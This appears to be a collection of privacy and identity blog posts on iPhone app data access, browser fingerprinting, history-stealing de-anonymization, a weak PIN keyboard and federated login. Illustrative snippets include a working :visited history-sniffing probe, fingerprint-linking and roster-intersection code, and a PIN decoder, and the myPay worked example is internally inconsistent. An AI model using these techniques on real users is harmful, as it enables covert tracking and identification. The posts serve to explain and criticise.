Enterprise lockdown versus consumer applications

My friend Cameron Westland, who has worked on some cool applications for the iPhone, wrote me to complain that I linked to iPhone Privacy:

I understand the implications of what you are trying to say, but how is this any different from Mac OS X applications accessing the address book or Windows applications accessing contacts? (I'm not sure about Windows, but I know it's possible on a Mac).

Also, the article touches on storing patient information on an iPhone. I believe Seriot is guilty of a major oversight in simply correlating the fact that spy phone has access to contacts with it also being able to do so in a secured enterprise.

If the iPhone is deployed in the enterprise, the corporate administrators can control exactly which applications get installed. In the situations where patient information is stored on the phone, they should be using their own security review process to verify that all applications installed meet the HIPAA certification requirements. Apple makes no claim that applications meet the stringent needs of certain industries – that's why they give control to administrators to encrypt phones, restrict specific application installs, and do remote wipes.

Also, Seriot did no research on the behavior of a phone connected to a company's Active Directory, versus just a plain old address book… This is cargo cult science at best, and I'm really surprised you linked to it!

I buy Cameron's point that the controls available to enterprises mitigate a number of the attacks presented by Seriot – and agree this is important.  How do these controls work?  Corporate administrators can set policies specifying the digital signatures of applications that can be installed.  They can use their own processes to decide what those applications will be.

None of this depends on App Store verification, sandboxing, or Apple's control of platform content.  In fact it is no different from the universally available ability to use a combination of enterprise policy and digital signature to protect enterprise desktop and server systems.  Other features, like the ability for an operator to wipe information, are also pretty much universal.
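To make the mechanism concrete, here is a minimal sketch of what such a policy check amounts to – an allowlist of signing-certificate thumbprints plus a signature check.  The types and names are mine for illustration, not any real MDM or Group Policy API:

import { createHash, createVerify } from "node:crypto";

interface AppPackage {
  binary: Buffer;        // the application itself
  signature: Buffer;     // the publisher's signature over the binary
  signerCertPem: string; // the publisher's certificate
}

// The administrator's policy: the only signers allowed to install.
const trustedSigners = new Set<string>([
  // sha256 thumbprints of corporate-approved signing certs go here
]);

function mayInstall(pkg: AppPackage): boolean {
  // 1. Compute the signer's thumbprint and check it against policy.
  const thumbprint = createHash("sha256")
    .update(pkg.signerCertPem)
    .digest("hex");
  if (!trustedSigners.has(thumbprint)) return false;

  // 2. Verify that the signature actually covers this binary.
  const verifier = createVerify("RSA-SHA256");
  verifier.update(pkg.binary);
  return verifier.verify(pkg.signerCertPem, pkg.signature);
}

Nothing here is specific to the iPhone – which is exactly the point: it is ordinary enterprise plumbing.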

If the iPhone can be locked down in enterprises, why is Seriot's paper still worth reading?  Because many companies and even governments are interested in developing customer applications that run on phones.  They can't dictate to customers what applications to install, and so lock-down solutions are of little interest.  They turn to Apple's own claims about security, and find statements like this one, taken from the otherwise quite interesting iPhone security overview.

Runtime Protection

Applications on the device are “sandboxed” so they cannot access data stored by other applications. In addition, system files, resources, and the kernel are shielded from the user’s application space. If an application needs to access data from another application, it can only do so using the APIs and services provided by iPhone OS. Code generation is also prevented.

Seriot shows that taking this claim at face value would be risky.  As he says in an eWeek interview:

“In late 2009, I was involved in discussions with the Swiss private banking industry regarding the confidentiality of iPhone personal data,” Seriot told eWEEK. “Bankers wanted to know how safe their information [stores] were, which ones are exactly at risk and which ones are not. In brief, I showed that an application downloaded from the App Store to a standard iPhone could technically harvest a significant quantity of personal data … [including] the full name, the e-mail addresses, the phone number, the keyboard cache entries, the Wi-Fi connection logs and the most recent GPS location.” 

It is worth noting that Seriot's demonstration is very easy to replicate, and doesn't depend on silly assumptions like convincing the user to disable their security settings and ignore all warnings.

The points made about banking applications apply even more to medical applications.  Doctors are effectively customers from the point of view of the information management services they use.  Those services won't be able to dictate the applications their customers deploy.  I know for sure that my doctor, bless his soul, doesn't have an IT department that sets policies limiting his ability to play games or buy stocks.  If he starts using his phone for patient-related activities, he should be aware of the potential issues, and that's what MedPage was talking about.

Neither MedPage, nor CNET, nor eWeek nor Seriot nor I are trying to trash the iPhone – it's just that application isolation is one of the hardest problems of computer science.  We are pointing out that the iPhone is a computing device like all the others and subject to the same laws of digital physics, despite dangerous mythology to the contrary.  On this point I don't think Cameron Westland and I disagree.

 

SpyPhone for iPhone

The MedPage Today blog recently wrote about “iPhone Security Risks and How to Protect Your Data — A Must-Read for Medical Professionals.”  The story begins: 

Many healthcare providers feel comfortable with the iPhone because of its fluid operating system, and the extra functionality it offers, in the form of games and a variety of other apps.  This added functionality is missing with more enterprise-based smart phones, such as the BlackBerry platform.  However, this added functionality comes with a price, and exposes the iPhone to security risks.

Nicolas Seriot, a researcher from the Swiss University of Applied Sciences, has found some alarming design flaws in the iPhone operating system that allow rogue apps to access sensitive information on your phone.

MedPage quotes a CNET article where Elinor Mills reports:

Lax security screening at Apple's App Store and a design flaw are putting iPhone users at risk of downloading malicious applications that could steal data and spy on them, a Swiss researcher warns.

Apple's iPhone app review process is inadequate to stop malicious apps from getting distributed to millions of users, according to Nicolas Seriot, a software engineer and scientific collaborator at the Swiss University of Applied Sciences (HEIG-VD). Once they are downloaded, iPhone apps have unfettered access to a wide range of privacy-invasive information about the user's device, location, activities, interests, and friends, he said in an interview Tuesday…

In addition, a sandboxing technique limits access to other applications’ data but leaves exposed data in the iPhone file system, including some personal information, he said.

To make his point, Seriot has created open-source proof-of-concept spyware dubbed “SpyPhone” that can access the 20 most recent Safari searches, YouTube history, and e-mail account parameters like username, e-mail address, host, and login, as well as detailed information on the phone itself that can be used to track users, even when they change devices.

Following the link to Seriot's paper, called iPhone Privacy, here is the abstract:

It is a little known fact that, despite Apple's claims, any applications downloaded from the App Store to a standard iPhone can access a significant quantity of personal data.

This paper explains what data are at risk and how to get them programmatically without the user's knowledge. These data include the phone number, email accounts settings (except passwords), keyboard cache entries, Safari searches and the most recent GPS location.

This paper shows how malicious applications could pass the mandatory App Store review unnoticed and harvest data through officially sanctioned Apple APIs. Some attack scenarios and recommendations are also presented.

 

In light of Seriot's paper, MedPage concludes:

These security risks are substantial for everyday users, but become heightened if your phone contains sensitive data, in the form of patient information, and when your phone is used for patient care.   Over at iMedicalApps.com, we are not fans of medical apps that enable you to input patient data, and there are several out there.  But we also have peers who have patient contact information stored on their phones, patient information in their calendars, or are accessible to their patients via e-mail.  You can even e-prescribe using your iPhone. 

I don't want to even think about e-prescribing using an iPhone right now, thank you.

Anyone who knows anything about security has known all along that the iPhone – like all devices – is vulnerable to some set of attacks.  For them, iPhone Privacy will be surprising not because it reveals possible attacks, but because of how amazingly elementary they are (the paper is a must-read from this point of view).  

On a positive note, the paper might awaken some of those sent into a deep sleep by proselytizers convinced that Apple's App Store censorship program is reasonable because it protects them from rogue applications.

Evidently Apple's App Store staff take their mandate to protect us from people like award-winning Mad Magazine cartoonist Tom Richmond pretty seriously (see Apple bans Nancy Pelosi bobble head).  If their approach to “protecting” the underlying platform has any merit at all, perhaps a few of them could be reassigned to work part time on preventing trivial and obvious hacker exploits.

But I don't personally think a closed platform with a censorship board is either the right approach or one that can possibly work as attackers get more serious (in fact, computer science has long known that this approach is baloney).  The real answer will lie in hard, unfashionable and (dare I say it?) expensive R&D into application isolation and related technologies.  I hope that will be the outcome:  first, for the sake of building a secure infrastructure;  second, because one of my phones is an iPhone and I like to explore downloaded applications too.

[Heads Up: Khaja Ahmed]

Sorry Tomek, but I “win”

As I discussed here, the EFF is running an experimental site demonstrating that browsers ooze an unnecessary “browser fingerprint” allowing users to be identified across sites without their knowledge.  One can easily imagine this scenario:

  1. Site “A” offers some service you are interested in, and you release your name and address to it.  At the same time, the site captures your browser fingerprint.
  2. Site “B” establishes a relationship with site “A” whereby it sends “A” a browser fingerprint and “A” responds with the matching identifying information.
  3. You are therefore unknowingly identified at site “B” – a flow sketched in the example below.
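In code, the linking step is almost trivial.  A sketch in TypeScript – the four-attribute fingerprint and both sites' data structures are invented for illustration; real fingerprints combine far more signals:

import { createHash } from "node:crypto";

interface BrowserAttributes {
  userAgent: string;
  screen: string;    // e.g. "1435x810x32"
  timezone: string;
  plugins: string[];
}

function fingerprint(a: BrowserAttributes): string {
  const canonical =
    [a.userAgent, a.screen, a.timezone, a.plugins.join(",")].join("|");
  return createHash("sha256").update(canonical).digest("hex");
}

// Site "A": you register, and A silently files your fingerprint
// alongside the name and address you released.
const knownAtA = new Map<string, { name: string; address: string }>();

function registerAtA(attrs: BrowserAttributes, name: string, address: string) {
  knownAtA.set(fingerprint(attrs), { name, address });
}

// Site "B": the same browser shows up; B asks A who it belongs to.
function identifyAtB(attrs: BrowserAttributes) {
  return knownAtA.get(fingerprint(attrs)); // identified, without consent
}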

I can see browser fingerprints being used for a number of purposes.  Some sites might use a fingerprint to keep track of you even after you have cleared your cookies – and rationalize this as providing added security.  Others will inevitably employ it for commercial purposes – targeted identifying customer information is high value.  And the technology can even be used for corporate espionage and cyber investigations.

It is important to point out that, like any fingerprint, the identification is only probabilistic.  EFF is studying what these probabilities are.  In my original test, my browser was unique among 120,000 other browsers – a number I found very disturbing.
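Uniqueness converts directly into bits of identifying information, which is the right way to compare such results.  A quick back-of-the-envelope:

// A fingerprint shared by only 1 in N browsers carries log2(N) bits
// of identifying information.
const bitsOfIdentity = (oneInN: number): number => Math.log2(oneInN);

bitsOfIdentity(120_000); // ≈ 16.9 bits
// For scale: about 33 bits are enough to single out one person
// among everyone on Earth, so ~17 bits from the browser alone is
// a very large head start.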

But friends soon wrote back to report that their browser was even “more unique” than mine!  And going through my feeds today I saw a post at Tomek's DS World where he reported a staggering fingerprint uniqueness of 1 in 433,751:

[screenshot: Tomek's Panopticlick result]

It's not that I really think of myself as super competitive, but these results were so extreme I decided to take the test again.  My new score is off the scale:

Tomek ends his post this way:

“So a browser can be used to identify a user on the Internet or to harvest some information without his consent. Will it really become a problem, and will it be addressed in some way in browsers in the future? This question has to be answered by the people responsible for browser development.”

I have to disagree.  It is already a problem.  A big problem.  These outcomes weren't at all obvious in the early days of the browser.  But today the writing is on the wall and needs to be addressed.  It's a matter right at the core of delivering on a trustworthy computing infrastructure.    We need to evolve the world's browsers to employ minimal disclosure, releasing only what is necessary, and never providing a fingerprint without the user's consent.

 

More unintended consequences of browser leakage

Joerg Resch at Kuppinger Cole points us to new research showing how social networks can be used in conjunction with browser leakage to provide accurate identification of users who think they are browsing anonymously.

Joerg writes:

Thorsten Holz, Gilbert Wondracek, Engin Kirda and Christopher Kruegel from Isec Laboratory for IT Security found a simple and very effective way to identify the person behind a website visitor without asking for any kind of authentication. Identify in this case means: full name, address, phone numbers and so on. What they do is just exploit the browser history to find out which social networks the user is a member of and to which groups he or she has subscribed within that social network.

The Practical Attack to De-Anonymize Social Network Users begins with what is known as “history stealing”.  

Browsers don’t allow web sites to access the user’s “history” of visited sites.  But we all know that browsers render links to sites we have visited in a different color than links to sites we have not.  This is available programmatically through JavaScript by examining the a:visited style.  So a malicious site can walk through a list of URLs, examining the a:visited style of each to determine whether it has been visited – all without the user being aware of it.
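The probe itself takes only a few lines.  Here is a sketch – the group URLs are hypothetical, and browser vendors have since begun restricting what getComputedStyle reports for :visited links:

// Sketch of history stealing, as it would run in a page the
// attacker controls.  The candidate URLs are hypothetical.
const candidateUrls: string[] = [
  "https://www.xing.com/net/some-group",
  "https://www.xing.com/net/another-group",
];

// Baseline: the color of a link that cannot have been visited.
const baseline = document.createElement("a");
baseline.href = "https://example.invalid/" + Math.random();
document.body.appendChild(baseline);
const unvisitedColor = getComputedStyle(baseline).color;

function wasVisited(url: string): boolean {
  const link = document.createElement("a");
  link.href = url;
  document.body.appendChild(link);
  // A visited link renders with the :visited color.
  const visited = getComputedStyle(link).color !== unvisitedColor;
  link.remove();
  return visited;
}

const visitedGroups = candidateUrls.filter(wasVisited);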

This attack has been known for some time, but what is novel is its use.  The authors claim the groups in all major social networks are represented through URLs, so history stealing can be translated into “group membership stealing”.  This brings us to the core of this new work.  The authors have developed a model for the identification characteristics of group memberships – a model that will outlast this particular attack, as dramatic as it is.
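The identification step can be stated just as compactly: each stolen group membership intersects away most of the network's user base.  A sketch, assuming the attacker has already crawled the group rosters (the crawl itself is not shown):

type UserId = string;

// Intersect the stolen group memberships against a crawled
// group -> members directory to shortlist candidate users.
function candidates(
  visitedGroups: string[],
  groupMembers: Map<string, Set<UserId>>,
): Set<UserId> {
  let shortlist: Set<UserId> | null = null;
  for (const group of visitedGroups) {
    const members = groupMembers.get(group) ?? new Set<UserId>();
    shortlist = shortlist === null
      ? new Set(members)
      : new Set([...shortlist].filter(u => members.has(u)));
  }
  return shortlist ?? new Set();
}

A handful of group memberships is often enough to leave exactly one candidate – which is just what happened to Joerg, below.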

The researchers have created a demonstration site that works with the European social network Xing.  Joerg tried it out and, as you can see from the table at left, it identified him uniquely – although he had done nothing to authenticate himself.  He says,

“Here is a screenshot from the self-test I did with the de-anonymizer described in my last post. I’m a member in 5 groups at Xing, but only active in just 2 of them. This is already enough to successfully de-anonymize me, at least if I use the Google Chrome Browser. Using Microsoft Internet Explorer did not lead to a result, as the default security settings (I use them in both browsers) seem to be stronger. That’s weird!”

Since I’m not a user of Xing I can’t explore this first hand.

Joerg goes on to ask whether history-stealing is a crime.  If it’s not, how mainstream is this kind of analysis going to become?  What is the right legal framework for considering these issues?  One thing is for sure:  this kind of demonstration, as it becomes widely understood, risks profoundly changing the way people look at the Internet.

To return to the idea of minimal disclosure for the browser, why do sites we visit need to be able to read the a:visited attribute?  This should again be thought of as “fingerprinting”, and before a site is able to retrieve the fingerprint, the user must be made aware that it opens the possibility of being uniquely identified without authentication.

Minimal disclosure for browsers

Not five minutes after pressing enter on my previous post a friend wrote back and challenged me to compare IE's behavior with that of Firefox.  I don't like doing product comparisons but clearly this is a question others will ask so I'll share the results with you:

Results:  the behavior of the two browsers is essentially identical.  In both cases, my browser was uniquely identified.

Conclusion:  we need to work across the industry to align browsers with minimal disclosure principles.  How much information needs to be released to a site we don't trust yet?  To what extent can the detailed information currently released be collapsed into non-identifying categories?  When there is some compelling reason to release detailed information, how do we inform the user that the site wants to obtain a fingerprint?

New EFF Research on Web Browser Tracking

Slashdot's CmdrTaco points us to a research project announced by EFF’s Peter Eckersley that I expect will provoke both discussion and action:

What fingerprints does your browser leave behind as you surf the web?

Traditionally, people assume they can prevent a website from identifying them by disabling cookies on their web browser. Unfortunately, this is not the whole story.

When you visit a website, you are allowing that site to access a lot of information about your computer's configuration. Combined, this information can create a kind of fingerprint – a signature that could be used to identify you and your computer. But how effective would this kind of online tracking be?

EFF is running an experiment to find out. Our new website Panopticlick will anonymously log the configuration and version information from your operating system, your browser, and your plug-ins, and compare it to our database of five million other configurations. Then, it will give you a uniqueness score – letting you see how easily identifiable you might be as you surf the web.

Adding your information to our database will help EFF evaluate the capabilities of Internet tracking and advertising companies, who are already using techniques of this sort to record people's online activities. They develop these methods in secret, and don't always tell the world what they've found. But this experiment will give us more insight into the privacy risk posed by browser fingerprinting, and help web users to protect themselves.

To join the experiment:
http://panopticlick.eff.org/

To learn more about the theory behind it:
http://www.eff.org/deeplinks/2010/01/primer-information-theory-and-priva…

Interesting that my own browser was especially recognizable:

[screenshot: my Panopticlick results]

I know my video configuration is pretty bizarre – but I don't understand why I should be broadcasting that when I casually surf the web.  I would also like to understand what is so special about my user agent info.

Pixel resolution like 1435 x 810 x 32 seems unnecessarily specific.  Applying the concept of minimal disclosure, it would be better to reveal simply that my machine is in some useful “class” of resolution that would not overidentify me.
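For instance, a browser applying minimal disclosure might report a coarse resolution class instead of the exact triple.  A sketch – the class boundaries are invented purely to illustrate:

// Report a coarse class rather than the exact "1435 x 810 x 32".
// The cut-offs here are invented, purely for illustration.
function resolutionClass(width: number, height: number): string {
  const pixels = width * height;
  if (pixels <= 1024 * 768) return "small";
  if (pixels <= 1680 * 1050) return "medium";
  if (pixels <= 2560 * 1600) return "large";
  return "very-large";
}

resolutionClass(1435, 810); // -> "medium": still useful to a site's
                            // layout engine, nearly useless as a fingerprint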

I would think the provisioning of highly identifying information should be limited to sites with which I have an identity relationship.  If we can agree on a shared mechanism for storing information about our trust for various sites (information cards offer this capability) our browsers could automatically adjust to the relationship they were in, releasing information as necessary.  This is a good example of how a better identity system is needed to protect privacy while providing increased functionality.

 

All the help we can get

Now that the world is so thoroughly post-modern, how often do you come across information that qualifies as unexpected?  Well, I have to say that the following story, appearing in The Australian, left me wide-eyed:

Yesterday, in the church of the City of London Corporation, (Canon Parrott) presented an updated version of Plow Monday, an observance that dates from medieval times. On this day, the first Monday after Twelfth Night, farm labourers would bring a plough to the door of the church to be blessed.

“When I arrived a few months ago I looked at this service and thought, ‘Why do we have a Plow Monday?’,” Canon Parrott said. Men and women coming to his church no longer used ploughs; their tools were their laptops, their iPhones and their BlackBerries.

So he wrote a blessing and strode out to deliver it before a congregation of 80, the white heat of technology shining from his every pronouncement. “I invite you to have your mobile phone out … though I would like you to put it on silent,” he said.

This was Church 2.0. Behind him, the altar resembled a counter at PC World. Upon it, laid out like holy relics, were four smart phones, one Apple laptop and one Dell.

Then, after another hymn, came the blessing of the smart phones. The Lord Mayor of London offered his BlackBerry to Canon Parrott, which was received with due reverence and placed upon the altar.

The congregation held their phones in the air, and Canon Parrott addressed the Almighty. “By Your blessing, may these phones and computers, symbols of all the technology and communication in our daily lives, be a reminder to us that You are a God who communicates with us and who speaks by Your Word. Amen.”

It makes me wonder what Innis said to McLuhan when he read about this.

Le Figaro carried a report of an additional prayer: “May our tongues be gentle, our e-mails be simple and our websites be accessible”.

Perhaps it is asking too much, but I would have really liked Canon Parrott to add, “websites be accessible and secure.”  After all – it can't hurt.  Perhaps next time?

Federation with ADFS in Windows Server 2008

Steve Riley at Amazon takes a fascinating and non-ideological approach on his new blog.  The combination will keep me tuned in – I expect others will feel the same way.  He writes:

“As I've talked with customers who have deployed or plan to deploy Windows Server 2008 instances on Amazon EC2, one feature they commonly inquire about is Active Directory Federation Services (ADFS). There seems to be a lot of interest in ADFS v2 with its support for WS-Federation and Windows Identity Foundation. These capabilities are fully supported in our Windows Server 2008 AMIs and will work with applications developed for both the “public” side of AWS and those you might run on instances inside Amazon VPC.

“I'd like to get a better sense of how you might use ADFS. When you state that you need “federation,” what are you wanting to do? I imagine most scenarios involve applications on Amazon EC2 instances obtaining tokens from an ADFS server located inside your corporate network. This makes sense when your users are in your own domains and the applications running on Amazon EC2 are yours.

“Another scenario involves a forest living entirely inside Amazon EC2. Imagine you've created the next killer SaaS app. As customers sign up, you'd like to let them use their own corpnet credentials rather than bother with creating dedicated logons (your customers will love you for this). You'd create an application domain in which you'd deploy your application, configured to trust tokens only from the application's ADFS. Your customers would configure their ADFS servers to issue tokens not for your application but for your application domain ADFS, which in turn issues tokens to your application. Signing up new customers is now much easier.

“What else do you have in mind for federation? How will you use it? Feel free to join the discussion. I've started a thread on the forums, please add your thoughts there. I'm looking forward to some great ideas.”
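The indirection in that second scenario is the whole point: the application never trusts customer ADFS servers directly, only its own application domain ADFS, which in turn decides which customer issuers to honor.  A conceptual sketch – invented names and shapes, nothing like the real ADFS or WIF APIs:

interface Token { issuer: string; subject: string; audience: string; }

const appDomainAdfs = {
  issuer: "adfs.appdomain.example",
  // Grows as new customers sign up – no application changes needed.
  trustedCustomerIssuers: new Set(["adfs.customer.example"]),

  // Exchange a customer-issued token for an application-domain token.
  exchange(t: Token): Token {
    if (!this.trustedCustomerIssuers.has(t.issuer)) {
      throw new Error("token not from a signed-up customer");
    }
    return { issuer: this.issuer, subject: t.subject, audience: "saas-app" };
  },
};

// The application accepts tokens only from its own domain's ADFS.
function appAccepts(t: Token): boolean {
  return t.issuer === "adfs.appdomain.example" && t.audience === "saas-app";
}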

I really look forward to this.  Let's see where it goes…  

Given the mail I get from mutual customers, I know Steve will end up with some interesting insights.

Bizarre customer journey at myPay…

Internet security is a sitting duck that could easily succumb to a number of bleak possible futures.

One prediction we can make with certainty is that as the overall safety of the net continues to erode, individual web sites will flail around looking for ways to protect themselves. They will come across novel ideas that seem to make sense from the vantage point of a single web site. Yet if they implement these ideas, most of them will backfire. Internet users have to navigate many different sites on an irregular basis. For them, the experience of disparate mechanisms and paradigms on every different site will be even more confusing and troubling than the current degenerating landscape. The Seventh Law of Identity is animated by these very concerns.

I know from earlier exchanges that Michael Ramirez understands these issues – as well as their architectural implications. So I can just imagine how he felt when he first encountered a new system that is, unfortunately, a perfect example of this dynamic. His first post on the matter started this way:

“Logging into the DFAS myPay site is frustrating. This is the gateway where DoD employees can view and change their financial data and records.

“In an attempt to secure the interface (namely, to prevent key loggers), they have implemented a JavaScript-based keyboard where the user must enter their PIN using their mouse (or using the keyboard, pressing tab LOTS of times).

“A randomization function is used to change the position of the buttons, presumably to prevent a simple click-tracking virus from simply replaying the click sequence. Numbers always appear on the upper row and the letters will appear in a random position on the same row where they exist on the keyboard (e.g. QWERTY letters will always appear on the top row, just in a random order).

“At first glance, I assumed that there would be some server-side state that identified the position of the buttons (as to not allow the user's browser to arbitrarily choose the positions). Looking at how the button layout is generated, however, makes it clear that the position is indeed generated by the client-side alone. Javascript functions are called to randomize the locations, and the locations of these buttons are included as part of the POST parameters upon authentication.

“A visOrder variable is included with a simple substitution cipher to identify button locations: 0 is represented by position 0, 1 by position 1, etc. Thus:

VisOrder     = 3601827594
Substitution = 0123456789
Example PIN  = 325476
Encoded      = 102867

“Thus any virus/program can easily mount an online guessing attack (since it defines the substitution pattern), and can quickly decipher the PIN if it has access to the POST parameters.

“The web site's security implementation is painfully trivial, so we can conclude that the JavaScript keyboard is there only to prevent keyloggers. But it has a number of side effects, especially with respect to the security of the password. Given the tedious nature of PIN entry, users choose extremely simplistic passwords. MyPay actually encourages this, as it does not enforce complexity requirements and limits the length of the password to between 4 and 8 characters. There is no support for upper/lower case or special characters. 36 possible values over a 4-character search space is not terribly secure.”
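To see how little the randomization buys, here is a sketch of the decoding step.  The exact digit mapping is my inference from the sample values above – I assume each PIN digit d is sent as the character at position d of visOrder:

// Recover the PIN from captured POST parameters, under the assumed
// mapping: encoded digit = visOrder[pinDigit].
function decodePin(visOrder: string, encoded: string): string {
  return [...encoded].map(c => visOrder.indexOf(c).toString()).join("");
}

decodePin("3601827594", "102867"); // -> the PIN, digit by digit

// Even without a capture, brute force is cheap: 36 symbols over
// 4 positions is only 36 ** 4 = 1,679,616 combinations.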

A few days later, Michael was back with an even stranger report. In fact this particular “user journey” verges on the bizarre. Michael writes:

“MyPay recently overhauled their interface and made it more “secure.” I have my doubts, but they certainly have changed how they interact with the user.

“I was a bit speechless. Pleading with users is new, but maybe it'll work for them. Apparently it'll be the only thing working for them:

Although most users have established their new login credentials with no trouble, some users are calling the Central Customer Support Unit for assistance. As a result, customer support is experiencing high call volume, and many customers are waiting on hold longer than usual.

We apologize for any inconvenience this may cause. We are doing everything possible to remedy this situation.

Michael concludes by making it clear he thinks “more than a few” users may have had trouble. He says, “Maybe, just maybe, it's because of your continued use of the ridiculous virtual keyboard. Yes, you've increased the password complexity requirements (which actually increased security), but slaughtered what little usability you had. I promise you that getting rid of it will ‘remedy this situation.'”

One might just shrug one's shoulders and wait for this to pass. But I can't do that.  I feel compelled to redouble our efforts to produce and adopt a common standards-based approach to authentication that will work securely and in a consistent way across different web sites and environments.  In other words, reusable identities, the claims-based architecture, and truly usable and intuitive visual interfaces.

OpenID and Information Cards at the NIH

Drummond Reed writes about real progress by the National Institutes of Health in making their sites accessible through what the U.S. government has started to call Open Identities.  The decision by the NIH and the U.S. administration to leverage existing identity infrastructures is tremendously interesting – it turns the usual paradigm for government identity on its head.  Drummond, who is Executive Director of the Information Card Foundation, writes:

Bethesda, MD, USA – The first iTrust Forum, held today at the National Institutes of Health (NIH) headquarters in Bethesda, MD, featured a four-part session about the U.S. government’s Open Identity for Open Government Initiative. NIH is leading government adoption of this initiative through the NIH Federated Identity Service. NIH demonstrated the first production use of open identity technologies at the iTrust Forum by showing how the Federated Identity Service now accepts logins from several of the ten OpenID and Information Card identity providers who have announced participation in the initiative.

In a separate demonstration, Don Schmidt of Microsoft showed a prototype “multi-protocol selector” – software that will enable users to do both OpenID and Information Card registration/login to websites through one simple, safe, visual interface. This will make authentication at many different websites dramatically simpler for users while at the same time providing strong protection against the main source of phishing attacks.

ICF Executive Director Drummond Reed and OpenID Foundation Executive Director Don Thibeau presented the Open Identity Framework (OIF), a new open trust framework model being developed jointly by the ICF and OIDF to solve the problem of how third-party portable identity credentials such as OpenID and Information Cards can be trusted in very large deployments, such as across the entire U.S. population and all U.S. government websites.

As described in the two foundations’ first joint white paper, the OIF is being developed to meet the requirements of the U.S. ICAM Trust Framework Provider Adoption Process (TFPAP). It applies the principles of open source software and open community development to the definition and deployment of trust frameworks for multiple trust communities around the world. It will allow identity providers to be certified for compliance with the levels of assurance (LOA) required by relying party websites, while also allowing relying parties to be certified for compliance with the levels of protection (LOP) that may be required by identity providers and the users they represent.

The OIF also applies market forces to certification and accountability by enabling identity providers and relying parties to make their own choice of assessor and auditor, provided they meet the qualifications specified by the trust framework for which they will provide assessment or auditing services.

The end goal of the Open Identity for Open Government Initiative at NIH and its Center for Information Technology (CIT) is to give users of NIH websites and other electronic resources the ability to have a single account and login procedure that will allow access to all NIH applications, as well as other government and private sector applications. This will make it easier for users to access information resources, remove the responsibility for authentication from website and application owners, and improve security.

The Open Identity initiative is already expanding to other U.S. government agencies beyond NIH, including the Food and Drug Administration (FDA) and the General Services Administration (GSA). The Library of Congress has also expressed an interest in joining.

The ICF congratulates the NIH Federated Identity team – led by Debbie Bucci, Valerie Wampler, Jane Small, Jim Seach, Tom Mason, and Peter Alterman – on its achievements; the team was recognized with both the 2008 NIH Director’s Award and the Government Information Technology Executive Council (GITEC) 2009 Project Management Excellence Award.